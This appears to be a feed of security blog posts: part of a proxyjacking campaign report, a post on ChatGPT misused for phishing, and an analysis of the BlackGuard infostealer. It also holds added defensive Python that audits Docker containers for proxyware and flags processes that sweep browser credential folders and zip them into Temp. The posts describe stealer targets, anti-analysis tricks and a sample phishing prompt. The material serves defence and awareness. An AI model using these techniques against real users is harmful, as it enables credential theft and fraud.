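A defender who wants to catch this on their own Docker hosts can audit the running containers against the two proxyware images the campaign used. The Python below is an added example, not part of the original post or of the researchers’ code: it parses the output of `docker ps --format` (a real Docker CLI option), flags images whose names contain honeygain or peer2profit, and separately reports any image not on a per-host allowlist, because the script described above replaces existing containers with its own. The `docker ps` rows, the allowlist and the image names in the sample are constructed.

```python
import re
from dataclasses import dataclass

# Images of the two bandwidth-sharing services named in the campaign. Matching is by
# substring so that tags or a private registry prefix do not hide them.
PROXYWARE_PATTERNS = tuple(
    re.compile(p, re.IGNORECASE) for p in (r"honeygain", r"peer2profit")
)

# Constructed allowlist of images this (hypothetical) host is expected to run.
ALLOWED_IMAGES = {"nginx:1.25", "postgres:16"}


@dataclass(frozen=True)
class Container:
    container_id: str
    image: str
    name: str
    command: str


def parse_docker_ps(output: str):
    """Parse tab-separated rows produced by
    docker ps --format '{{.ID}}\\t{{.Image}}\\t{{.Names}}\\t{{.Command}}'
    Raises ValueError on a row with the wrong number of fields."""
    rows = []
    for line in output.splitlines():
        if not line.strip():
            continue
        fields = line.split("\t")
        if len(fields) != 4:
            raise ValueError(f"unexpected docker ps row: {line!r}")
        rows.append(Container(*fields))
    return rows


def audit_containers(containers, allowed_images=ALLOWED_IMAGES):
    """Sort containers into known proxyware, images missing from the allowlist, and approved."""
    report = {"proxyware": [], "unapproved": [], "approved": []}
    for c in containers:
        if any(p.search(c.image) for p in PROXYWARE_PATTERNS):
            report["proxyware"].append(c)
        elif c.image not in allowed_images:
            report["unapproved"].append(c)
        else:
            report["approved"].append(c)
    return report


# Constructed `docker ps` output: two legitimate services, two proxyware containers
# (image names modelled on the public Docker Hub images mentioned in the post) and one
# unexpected image that deserves a look even though it is not proxyware.
SAMPLE_DOCKER_PS = "\n".join([
    "3f2a1b9c0d1e\tnginx:1.25\tweb\t\"nginx -g 'daemon off;'\"",
    "a1b2c3d4e5f6\tpeer2profit/peer2profit_linux:latest\tp2p\t\"/bin/sh -c /start.sh\"",
    "0f9e8d7c6b5a\thoneygain/honeygain:latest\thg\t\"/bin/sh -c /start.sh\"",
    "112233445566\tpostgres:16\tdb\t\"docker-entrypoint.sh postgres\"",
    "deadbeef0001\tregistry.example.invalid/ops/agent:2.1\tagent\t\"/agent\"",
])

if __name__ == "__main__":
    report = audit_containers(parse_docker_ps(SAMPLE_DOCKER_PS))
    for category, items in report.items():
        for c in items:
            print(f"[{category}] {c.name} ({c.image})")
```

On a real host, feed the function the live `docker ps` output and treat anything in the proxyware bucket as an incident rather than a policy violation, since the image did not get there through a change request.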

Distribution server

Researchers traced the attack back to a compromised web server in Libya that distributed components for the attacks. The server ran outdated and unmaintained components, including a library called metro-bootstrap. Three files were last modified in 2014, while newer files suggested the server had been compromised. Researchers used `wget -r` to download all files for analysis. The csdark.css file was uploaded first, followed by metro-bootstrap.min.xcss, and then vksp, which was later found to be a Linux-specific crypto-miner named perfcc. Analysis revealed that vksp contained a crypto-mining utility, exploits, and hacking tools, which suggests a pivot from cryptojacking to proxyjacking or a combination of the two. Hosted on the same website, these executables are proof of actors who will capitalize on this monetization strategy.

Why do they do it?

In this campaign, Peer2Profit and Honeygain were the two P2P proxy monetization schemes discovered. Both have public Docker images with over 1 million downloads. Although they are technically legitimate, some potentially unscrupulous companies use these proxies for data collection and advertising. Some companies allow users to see precisely how their traffic is being used. While these applications are not inherently harmful and are marketed as voluntary services that offer compensation in exchange for sharing unused internet bandwidth, some companies fail to properly verify the sourcing of the IPs in their network. Sometimes, they even suggest installing the software on work computers, which is risky.

How to avoid proxyjacking?

By itself, providing a proxy service is perfectly legitimate: each user is free to provide bandwidth for any purpose. However, if this happens without the user’s knowledge, it becomes a cybercrime. Preventing it is not as difficult as it may seem at first glance. It’s enough to be cautious when using the Internet and adhere to the following recommendations:

  • Use strong passwords. A strong password is the first line of defense, so we recommend using a password generator to create one. Also, avoid reusing the same password on different sites.
  • Use two-factor authentication. If your first line of defense falls, 2FA still won’t let the attacker in, because they cannot access the confirmation code.
  • Install all OS and software updates regularly. Software updates are patches for vulnerabilities through which attackers can also infiltrate your device.
  • Use advanced anti-malware solutions. While a basic security tool satisfies most of the average user’s needs, you can use an advanced anti-malware tool. It’s a great addition to Windows Protector and will protect your device from various attacks.

ChatGPT has become a New tool for Cybercriminals in Social Engineering
https://gridinsoft.com/blogs/chat-gpt-social-engineering/
Published: Mon, 05 Jun 2023 23:03:09 +0000

Artificial intelligence has become an advanced tool in today’s digital world. It can facilitate many tasks, help solve complex multi-level equations and even write a novel. But as in any other sphere, cybercriminals have found a way to profit here too. With ChatGPT, they can deceive a user convincingly and skillfully and thus steal their data. The key application of this innovative technology for them is social engineering attempts.

What is Social Engineering?

Social engineering is a method by which fraudsters psychologically and behaviorally manipulate individuals or organizations for malicious purposes. The typical objective is to obtain sensitive information, commit fraud, or gain control over computer systems or networks through unauthorized access. To look more legitimate, hackers try to contextualize their messages or, if possible, mimic well-known persons.

Social engineering attacks are frequently successful because they take advantage of human psychology, using trust, curiosity, urgency, and authority to deceive individuals into compromising their security. That’s why it’s crucial to remain watchful and take security precautions, such as being careful of unsolicited communications, verifying requests before sharing information, and implementing robust security practices to safeguard against social engineering attacks.

ChatGPT and Social Engineering

Social engineering is a tactic hackers use to manipulate individuals into performing specific actions or divulging sensitive information, putting their security at risk. While ChatGPT could be misused as a tool for social engineering, it is not designed for that purpose; cybercriminals could exploit any conversational AI or chatbot for their social engineering attacks. Where it used to be possible to recognize attackers by their illiterate, error-ridden spelling, with ChatGPT their messages now look convincing, competent, and accurate.

Image: a scammer’s email with illiterate and erroneous spelling

Example of Answer from ChatGPT

To prevent abuse, OpenAI, the creators of ChatGPT, have implemented safeguards in it. However, these measures can be bypassed, mainly through social engineering. For example, a harmful individual could use ChatGPT to write a fraudulent email and then send it with a deceitful link or request included.

This is an approximate request for ChatGPT: “Write a friendly but professional email saying there’s a question with their account and to please call this number.”

Here is the first answer from ChatGPT:

Image: example of an answer from ChatGPT

What makes ChatGPT dangerous?

There are concerns about using ChatGPT by cyber attackers to bypass detection tools. This AI-powered tool can generate multiple variations of messages and code, making it difficult for spam filters and malware detection systems to identify repeated patterns. It can also explain code in a way that is helpful to attackers looking for vulnerabilities.

In addition, other AI tools can imitate specific people’s voices, allowing attackers to deliver credible and professional social engineering attacks. For example, this could involve sending an email followed by a phone call that spoofs the sender’s voice.

ChatGPT can also create convincing cover letters and resumes that can be sent to hiring managers as part of a scam. Unfortunately, there are also fake ChatGPT tools that exploit the popularity of this technology to steal money and personal data. Therefore, it’s essential to be cautious and only use reputable chatbot sites based on trusted language models.

Protect Yourself Against AI-Enhanced Social Engineering Attacks

It’s important to remain cautious when interacting with unknown individuals or sharing personal information online. Whether you’re dealing with a human or an AI, if you encounter any suspicious or manipulative behavior, it’s crucial to report it and take appropriate steps to protect your personal data and online security.

  1. Be cautious of unsolicited messages or requests, even if they seem to come from someone you know.
  2. Always verify the sender’s identity before clicking links or giving out sensitive information.
  3. Use unique and strong passwords, and enable two-factor authentication on all accounts.
  4. Keep your software and operating systems up to date with the latest security patches.
  5. Lastly, be aware of the risks of sharing personal information online and limit the amount of information you share.
  6. Utilize cybersecurity tools that incorporate AI technology, such as natural language processing and machine learning, to detect potential threats and alert humans for further investigation.
  7. Consider implementing tools like ChatGPT in phishing simulations to familiarize users with the superior quality and tone of AI-generated communications.

With the rise of AI-enhanced social engineering attacks, staying vigilant and following online security best practices is crucial.

BlackGuard Receives Update, Targets More Cryptowallets
https://gridinsoft.com/blogs/blackguard-update-cryptowallets/
Published: Fri, 24 Mar 2023 08:57:40 +0000

BlackGuard, a prolific infostealer malware, received an update at the turn of 2023. The update introduced advanced data-stealing capabilities and secure connectivity features. The new version also includes a number of new anti-detection and anti-analysis capabilities. Let’s have a more detailed look at this malware and see what has changed.

BlackGuard Stealer – What is it?

BlackGuard is a classic infostealer malware, programmed in C#. It aims at grabbing personal data from web browsers, particularly seeking data related to cryptocurrency wallets. It first appeared in 2021, being promoted both on Darknet forums and in a dedicated Telegram community. A lifetime subscription for this malware costs $700, while a monthly subscription is available for $200. Its promotion campaign saw a major boost in 2022, when its competitor Raccoon went for a hiatus.

From its beginning, BlackGuard aimed precisely at stealing crypto credentials, and this remained its focus in further updates. The November 2022 patch brought overall improvements to the way the malware gathers cryptocurrency-related data, and also introduced the ability to load other malware, i.e. to act as a dropper. Patch notes published in the Telegram community describe a pack of other changes, mostly related to C2 connectivity.

Image: Telegram post promoting the updated BlackGuard version

Anti-analysis tactics

The first notable thing about BlackGuard malware is its anti-analysis measures. BlackGuard typically arrives at a target device in an encrypted form; the encryption is done by a tool embedded into the malware’s admin panel. Additionally, its code is obfuscated in a rather specific manner: base64-encoded strings are decoded only at runtime, and even before decoding, the strings are stored as byte arrays, which are completely unreadable. This practice appears to be quite effective against anti-malware programs that try to analyze strings.

The malware also checks the computer name, seeking a match with a hardcoded list embedded in its code. These are the names typically assigned to virtual machines or live systems used in malware analysis. If a match is found, BlackGuard ceases any further execution. Debugging also receives its treatment: the malware can block all input if it detects the activity of a debugging tool. As is typical for malware developed in Russia and other ex-USSR countries, this stealer refuses to run in ex-USSR countries.

Image: list of usernames that are not acceptable for BlackGuard

Data stealing

Once all the checks are passed, the malware starts its main course: credential stealing. As mentioned above, BlackGuard’s primary target is login information stored in web browsers, along with data related to cryptocurrency wallets, both browser extensions and desktop applications. It searches the AppData/Local folder for directories that belong to web browsers and applications. All the gathered data is placed in the folder from which the malware was launched (usually Users/Temp). Before sending it to the command server, the malware packs the data into a password-protected .zip archive; the password is hardcoded in its code.
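The behaviour just described, a single process sweeping several browser profile directories under AppData\Local and then packing the loot into a .zip in a Temp folder, is a usable detection rule. The Python below is an added example, not code from the post or from the malware: it runs that rule over constructed file-access events of the kind an EDR or Sysmon pipeline would produce, and shows that a browser reading its own profile, or a backup tool archiving outside Temp, does not trip it. The process names, paths, event format and the list of profile directories are assumptions made for the sample.

```python
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class FileEvent:
    pid: int
    process: str
    op: str     # "read" or "create"
    path: str


# Profile directories under AppData\Local for some of the browsers listed in the post,
# lower-case and backslash-separated. Extend with the rest of the list as needed.
BROWSER_PROFILE_DIRS = (
    "google\\chrome",
    "microsoft\\edge",
    "bravesoftware",
    "vivaldi",
    "opera software",
    "chromium",
)
LOCAL_MARKER = "\\appdata\\local\\"


def _normalize(path: str) -> str:
    return path.replace("/", "\\").lower()


def profile_owner(path: str):
    """Return the browser directory a path belongs to, or None for anything else."""
    p = _normalize(path)
    idx = p.find(LOCAL_MARKER)
    if idx < 0:
        return None
    rest = p[idx + len(LOCAL_MARKER):]
    for d in BROWSER_PROFILE_DIRS:
        if rest == d or rest.startswith(d + "\\"):
            return d
    return None


def is_temp_archive(path: str) -> bool:
    """A .zip created under any Temp directory (the post notes the stealer stages loot there)."""
    p = _normalize(path)
    return p.endswith(".zip") and "\\temp\\" in p


def detect_stealer_activity(events, min_profiles: int = 3):
    """Alert on a process that read from >= min_profiles distinct browser profile
    directories and then created a zip archive in a Temp directory."""
    touched = defaultdict(set)  # pid -> browser dirs read so far
    alerts = []
    for ev in events:
        if ev.op == "read":
            owner = profile_owner(ev.path)
            if owner:
                touched[ev.pid].add(owner)
        elif ev.op == "create" and is_temp_archive(ev.path):
            if len(touched[ev.pid]) >= min_profiles:
                alerts.append({"pid": ev.pid, "process": ev.process,
                               "profiles": sorted(touched[ev.pid]), "archive": ev.path})
    return alerts


# Constructed event stream (process names and paths are invented for the sample).
SAMPLE_EVENTS = [
    # A browser reading only its own profile: normal.
    FileEvent(1001, "chrome.exe", "read", r"C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    # A backup tool reading several profiles but archiving outside Temp: not flagged.
    FileEvent(2002, "backup.exe", "read", r"C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    FileEvent(2002, "backup.exe", "read", r"C:\Users\alice\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Login Data"),
    FileEvent(2002, "backup.exe", "read", r"C:\Users\alice\AppData\Local\Vivaldi\User Data\Default\Login Data"),
    FileEvent(2002, "backup.exe", "create", r"D:\Backups\alice-2023-03.zip"),
    # Stealer-like process: sweeps three profiles, then zips into Temp.
    FileEvent(4242, "update.exe", "read", r"C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    FileEvent(4242, "update.exe", "read", r"C:\Users\alice\AppData\Local\Microsoft\Edge\User Data\Default\Login Data"),
    FileEvent(4242, "update.exe", "read", r"C:\Users\alice\AppData\Local\Vivaldi\User Data\Default\Login Data"),
    FileEvent(4242, "update.exe", "read", r"C:\Users\alice\AppData\Local\Temp\stage\notes.txt"),
    FileEvent(4242, "update.exe", "create", r"C:\Users\alice\AppData\Local\Temp\stage\collected.zip"),
]

if __name__ == "__main__":
    for alert in detect_stealer_activity(SAMPLE_EVENTS):
        print(f"pid {alert['pid']} ({alert['process']}) read {alert['profiles']} then wrote {alert['archive']}")
```

The threshold of three distinct profiles is the knob that separates a stealer from a browser; tune it against the browsers actually installed in your environment, and add the wallet directories from the lists below once you have confirmed where each one stores its data.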

Image: folders with collected data

List of web browsers attacked by BlackGuard

Chrome, Opera, Firefox, Edge, Iridium, 7Star,
CentBrowser, Chedot, Vivaldi, Kometa, Elements Browser, Epic Privacy Browser,
Sputnik, Nichrome, K-Meleon, Uran, liebao, CocCoc,
MapleStudio, BraveSoftware, Chromodo, uCozMedia, QIPSurf, Orbitum,
Comodo, Coowon, Amigo, Torch, Comodo, 360Browser

Crypto wallets attacked by BlackGuard

Desktop applications:
AtomicWallet, AtomicDEX, Exodus, LitecoinCore, Monero, Jaxx,
Zcash, BitcoinCore, DashCore, Electrum, Ethereum, Solar,
Wassabi, TokenPocket, Frame, Zap, Binance, Coinbase

Browser extensions:
Binance, KEPLR, coin98, Mobox, Metamask, Phantom,
BitApp, Starcoin, Slope Wallet, Finnie, Guildwallet, iconx,
Swash, Crocobit, XinPay, Sollet, Auvitas wallet, Math wallet,
Yoroi wallet, Ronin wallet, MTV wallet, Rabet wallet, ZilPay wallet, Terra Station,
Nifty, Jaxx, Liquality, Math10, Exodus, OXYGEN

Other applications

Additionally, BlackGuard is capable of collecting credentials from a number of VPN clients and FTP/SFTP utilities, desktop messenger apps, and Microsoft Outlook. In particular, it grabs credentials from the configuration files of NordVPN, OpenVPN and ProtonVPN. Steam and Discord are handled in a similar manner, while for Tox, Signal, Pidgin, Telegram and Element, entire conversations are collected.

How to protect yourself?

There is only one consistent spreading method used by the threat actors who operate BlackGuard: email spam. This spam, however, will most likely take the form of spear phishing that mimics genuine mailings or even messages the victim is expecting. Most of the time, crooks gather information about their victims via OSINT for some time before sending messages.

The message itself contains an attached file, commonly an MS Office document. However, any file that can carry executable content may be used. Office files gained popularity because the VBS macro scripts they can carry are ignored by the vast majority of anti-malware software. Launching the file makes the script run: it contacts the command server, downloads the payload, and runs it. This obscenely simple scheme was disrupted by the introduction of Mark-of-the-Web. Using it, Microsoft marks potentially risky files, drawing additional attention from anti-malware programs. Still, that feature is present only in the latest Windows versions, and as usually happens, users are in no hurry to install them.

Another piece of advice is to use anti-malware programs. Hackers do their best to make you believe the spam email or online banner. For that reason, it is better to exclude the human factor by using an automated solution that will not be fooled. But to be sure that something as sneaky as BlackGuard will not slip through, the security tool must have multi-layer protection. GridinSoft Anti-Malware can offer this to you: the program features classic database-backed scanning as well as a heuristic engine and an AI-based detection system. Together they create a reliable shield even against the most modern, and potent, threats.
